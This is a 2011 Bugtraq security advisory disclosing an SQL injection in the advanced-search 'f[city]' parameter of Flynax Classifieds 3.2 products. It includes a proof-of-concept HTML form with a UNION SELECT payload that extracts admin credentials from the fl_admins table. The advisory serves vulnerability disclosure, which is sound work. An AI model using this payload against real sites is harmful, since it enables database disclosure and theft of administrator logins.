[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CADxQvgsyj6Vp5hDpFJOWqyA8XRJQVbt-GA4uOhp1RK0D7Apvhw@mail.gmail.com>
Date: Mon, 26 Sep 2011 11:03:13 -0300
From: Nasel Pentest <pentest@...el.com.ar>
To: bugtraq@...urityfocus.com
Subject: Vulnerability found in Flynax Classifieds products
I. BACKGROUND
--------------
Flynax is a software development company which produces several CMSs to mantain
different kinds of classifieds websites.
II. DESCRIPTION
----------------
Nasel members discovered a critical vulnerability in the front-end of
these products.
The vulnerability is an SQL injection in the advanced search,
specifically in the "f[city]" parameter located at following files:
- General Classifieds Software: dealers.html,
- Real Estate Classifieds: agents-realtors.html.
- Auto Classifieds Script: dealers.html
- Pets Classifieds Software: dealers.html
Exploiting this vulnerability can lead to a full disclosure of the database.
III. AFFECTED PRODUCTS
-----------------------
- General Classifieds Software 3.2
- Auto Classifieds Script 3.2
- Real Estate Classifieds 3.2
- Pets Classifieds Software 3.2
IV. PoC
------------
<form action="http://site/path/dealers.html" method="post">
Injection:<input value="') and 1=0 union all select
1,2,3,4,concat_ws(0x3a, User,
Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from
fl_admins#" name="f[city]" type="text">
<input type="hidden" name="search" value="true">
<input type="hidden" value="" name="f[country]">
<input type="submit" value="Send">
</form>
The name of the admin users table can differ depending on the product's version.
V. CREDITS
-----------
This vulnerability was found by the Nasel Penetration Testing team formed by:
- Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)
- Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)
- Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)
- Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)
VI. ADVISORY INFORMATION
-------------------------
2011-09-15
==========
Vulnerability Found. Vendor notification. Scheduled advisory release
on September 25th, 2011.
2011-09-17
==========
Vendor replied that the problem was fixed.
2011-09-25
==========
Advisory released.
--
Nasel Penetration Testing Team
http://www.nasel.com.ar
Powered by blists - more mailing lists